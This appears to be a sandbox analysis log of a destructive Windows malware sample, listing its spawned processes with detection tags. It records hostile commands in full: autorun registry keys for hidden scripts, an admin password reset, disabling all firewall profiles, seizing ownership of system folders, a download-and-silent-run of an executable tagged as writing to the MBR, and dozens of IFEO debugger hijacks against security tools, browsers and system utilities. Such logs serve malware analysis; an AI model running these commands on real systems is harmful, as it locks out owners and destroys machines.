C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\timedate.cpl",4⤵
-
-
-
C:\Windows\system32\mmc.exemmc.exe3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\appwiz.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\appwiz.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\main.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl",4⤵
-
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\azman.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\calc.execalc3⤵
-
-
C:\Windows\system32\calc.execalc3⤵
-
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults3⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\123.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\1234.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\gay.bat3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v mbr.exe /d "C:\Windows\N3OS3X3R\mbr.exe"3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v gay.bat /d c:\gay.bat3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\123.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\1234.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\gay.bat3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\123.vbs"3⤵
- Enumerates connected drives
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\1234.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://pbs.twimg.com/media/FkSeD3kXkAEVNrI?format=jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\wallpaper.jpg'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name Wallpaper -Value 'C:\Users\Admin\AppData\Local\Temp\wallpaper.jpg'; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Wallpaper { [DllImport(\"user32.dll\")] public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); }'; [Wallpaper]::SystemParametersInfo(20, 0, 'C:\Users\Admin\AppData\Local\Temp\wallpaper.jpg', 3)"3⤵
- Command and Scripting Interpreter: PowerShell
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k0w3eymk\k0w3eymk.cmdline"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD6.tmp" "c:\Users\Admin\AppData\Local\Temp\k0w3eymk\CSCD929CFCC993413B97ACC5E839B6261F.TMP"5⤵
-
-
-
-
C:\Windows\system32\control.execontrol userpasswords23⤵
-
C:\Windows\system32\netplwiz.exe"C:\Windows\system32\netplwiz.exe"4⤵
-
-
-
C:\Windows\system32\control.execontrol userpasswords3⤵
-
-
C:\Windows\system32\cscript.execscript email_spam.vbs3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\comexp.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\credwiz.execredwiz.exe3⤵
-
-
C:\Windows\system32\notepad.exenotepad3⤵
-
-
C:\Windows\system32\DisplaySwitch.exedisplayswitch3⤵
-
-
C:\Windows\system32\calc.execalc3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\main.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\sysdm.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\sysdm.cpl",4⤵
-
-
-
C:\Windows\system32\OptionalFeatures.exeoptionalfeatures3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\mmsys.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\mmsys.cpl",4⤵
-
-
-
C:\Windows\system32\control.execontrol3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\timedate.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\timedate.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
-
-
-
C:\Windows\system32\control.execontrol system3⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\azman.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\ncpa.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\ncpa.cpl",4⤵
-
-
-
C:\Windows\system32\dccw.exedccw.exe3⤵
-
-
C:\Windows\system32\dfrgui.exedfrgui.exe3⤵
-
-
C:\Windows\system32\iscsicpl.exeiscsicpl3⤵
-
-
C:\Windows\system32\colorcpl.execolorcpl.exe3⤵
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵
-
-
C:\Windows\system32\eventvwr.exeeventvwr.exe3⤵
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"4⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵
-
-
C:\Windows\system32\DisplaySwitch.exedisplayswitch3⤵
-
-
C:\Windows\system32\calc.execalc3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\main.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\sysdm.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\sysdm.cpl",4⤵
-
-
-
C:\Windows\system32\OptionalFeatures.exeoptionalfeatures3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\mmsys.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\mmsys.cpl",4⤵
-
-
-
C:\Windows\system32\control.execontrol3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\timedate.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\timedate.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
-
-
-
C:\Windows\system32\control.execontrol system3⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\azman.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\ncpa.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\ncpa.cpl",4⤵
-
-
-
C:\Windows\system32\net.exenet user "Admin" "YOU HAVE BEEN FUCKED"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin" "YOU HAVE BEEN FUCKED"4⤵
-
-
-
C:\Windows\system32\net.exenet user Admin ih82011jaxs3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin ih82011jaxs4⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://sfdl.360safe.com/instbeta.exe' -OutFile 'C:\Windows\N3OS3X3R\chinah.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K fucking.bat3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\N3OS3X3R\chinah.exeC:\Windows\N3OS3X3R\chinah.exe /VERYSILENT /NORESTART4⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\fsmgmt.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵
- Unexpected DNS network traffic destination
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
-
C:\Windows\system32\find.exefind /i "IPv4"3⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get size3⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵
-
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
-
-
-
C:\Windows\system32\SlideToShutDown.exeslidetoshutdown.exe3⤵
-
-
C:\Windows\system32\iexpress.exeiexpress.exe3⤵
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\timeout.exetimeout 2 /NOBREAK3⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /Grant Users:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\ /Grant Users:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\charmap.execharmap.exe3⤵
-
-
C:\Windows\system32\cleanmgr.execleanmgr.exe3⤵
- Enumerates connected drives
-
-
C:\Windows\system32\certreq.execertreq.exe3⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\certmgr.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\speech.vbs"3⤵
-
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\Web" /A /R /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Web" /setowner "Administrators" /T /C3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\reg.exereg add "HKCR\inffile\shell\Install\command" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKCR\regfile\shell\open\command" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCR\VBSFile\Shell\Edit\Command" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msert.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssecse.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner32.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbsedit.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htaedit.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VirtualBox.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uTorrent.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uninstall.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adwcleaner_5.005.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\student.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit32.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit33.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\installer.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\update.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updater.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\plugin-hang-ui.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mdsched.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashreporter.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD" /d "1" /t REG_DWORD /f3⤵
- Disables cmd.exe use via registry modification
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe\Debugger" /3⤵
-
-
